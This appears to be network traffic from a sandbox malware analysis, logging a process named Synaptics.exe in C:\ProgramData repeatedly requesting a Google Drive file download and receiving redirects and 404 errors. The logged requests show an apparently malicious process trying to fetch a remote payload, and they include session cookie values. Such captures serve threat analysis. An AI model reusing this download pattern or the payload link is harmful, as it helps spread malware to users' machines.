2024-12-30 10:25:37 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:37 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 53 6c 2d 70 6f 73 58 6b 75 43 4d 47 50 4e 5f 51 6c 6c 63 6f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="pSl-posXkuCMGPN_Qllcog">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:37 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.10	49921	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:37 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:38 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:37 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-w3XLp5Bb4twNL32w4_gB0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.10	49923	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:37 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:38 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:37 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-QQHXQV8MELeeJH8SkQCBFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.10	49925	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:37 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:38 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6wBVouWvJgn0JBMsI4xj29JxmtOMxj5Mlyx5o2j9nOVnrvMq8wX3Zy7eEnRED3o9s5lgYAEIw Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:38 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-L14v-Mk4Sr0umRXI3Xez7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:38 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:38 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 43 41 39 42 42 36 48 74 64 7a 77 33 72 7a 42 58 47 33 6f 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="WCA9BB6Htdzw3rzBXG3orQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:38 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.10	49936	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:38 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:39 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6eYygtDMd7OJlAL5iWKaMAOqTgPTxg4JGvu4SW1v6ox5ogLrZ6MWuY8K_a-avRM_26 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:39 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-kpoU2ys3a3YmUyI80p8ttg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:39 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:39 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 5f 35 76 63 68 51 55 4c 61 34 65 32 4d 79 2d 56 55 6a 4c 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="W_5vchQULa4e2My-VUjLcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:39 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.10	49932	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:38 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E
2024-12-30 10:25:39 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:38 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-UjA0dOAha5e_w3lP7v4VoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.10	49933	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:38 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E
2024-12-30 10:25:39 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:38 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-kzxfdQ1xcu_JxmfI6HGKSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.10	49939	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:38 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:39 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4QkIM37mBp7IOigMBNoVIUWodw-vk8n2uvKNdkZ5CC4ky34pPAgrqjZ9P7hOhLSF7KVPXjV4o Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:39 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-hMsL6SwbhAoPYrYRDo1uJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:39 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:39 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 64 50 35 49 35 51 4d 51 71 67 71 35 6f 39 67 74 4f 4c 64 42 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="9dP5I5QMQqgq5o9gtOLdBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:39 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.10	49948	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:39 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E
2024-12-30 10:25:40 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:39 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-yjJKoAh6jeApVPVj0RDLzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

